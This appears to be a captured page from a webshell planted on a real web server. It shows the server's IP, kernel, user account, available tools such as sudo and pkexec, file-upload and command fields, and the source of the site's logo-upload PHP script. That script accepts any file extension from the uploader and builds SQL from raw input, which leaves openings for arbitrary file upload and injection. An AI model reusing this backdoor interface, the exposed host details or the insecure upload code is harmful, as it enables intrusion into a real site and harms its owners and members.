403Webshell
Server IP : 51.89.169.208  /  Your IP : 216.73.216.57
Web Server : Apache
System : Linux ns3209505.ip-198-244-202.eu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Tue Nov 5 04:50:16 EST 2024 x86_64
User : yellowleaf ( 1019)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/yellowleaf/public_html/members/ajax/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/yellowleaf/public_html/members/ajax/NEW_ajax_upload_logo.php
<?php

$path  = $_SERVER['DOCUMENT_ROOT'];
include_once $path.'/connect_db.php';
session_start();
// print_r($_SESSION);

if (isset($_SESSION["ename"])) {
	$useremail = $_SESSION["ename"];

	if (isset($_FILES["logoImg"]) && isset($_POST["adid"])) {
		$res_member = $connect->query("SELECT * FROM `members` WHERE `ename` = '{$useremail}'");

		if ($res_member->num_rows > 0) {
			$row = $res_member->fetch_array(MYSQLI_ASSOC);
			$memberid = $row["memberid"];
			$adid = addslashes(trim($_POST["adid"]));
			$target_dir = $path."/members/uploads/logo/";
			$image = $_FILES['logoImg']['name'];
			$tmp_image = $_FILES['logoImg']['tmp_name'];
			$filename = $adid.'.'. pathinfo($image , PATHINFO_EXTENSION);
			$newFileName = $target_dir.$filename;

			move_uploaded_file($tmp_image, $newFileName);
			$result = $connect->query("UPDATE `ads` SET `image` = '$filename' WHERE memberid ='{$memberid}' AND `adid` = '$adid'");
	
			if ($result) {
				echo 'UPLOAD_SUCCESS';
			} else {
				echo "UPLOAD_FAILED";
			}
		}
		// print_r($_FILES["logoImg"]);
		
	}else{
		echo "NO_IMAGE";
	}
}

?>

Youez - 2016 - github.com/yon3zu
LinuXploit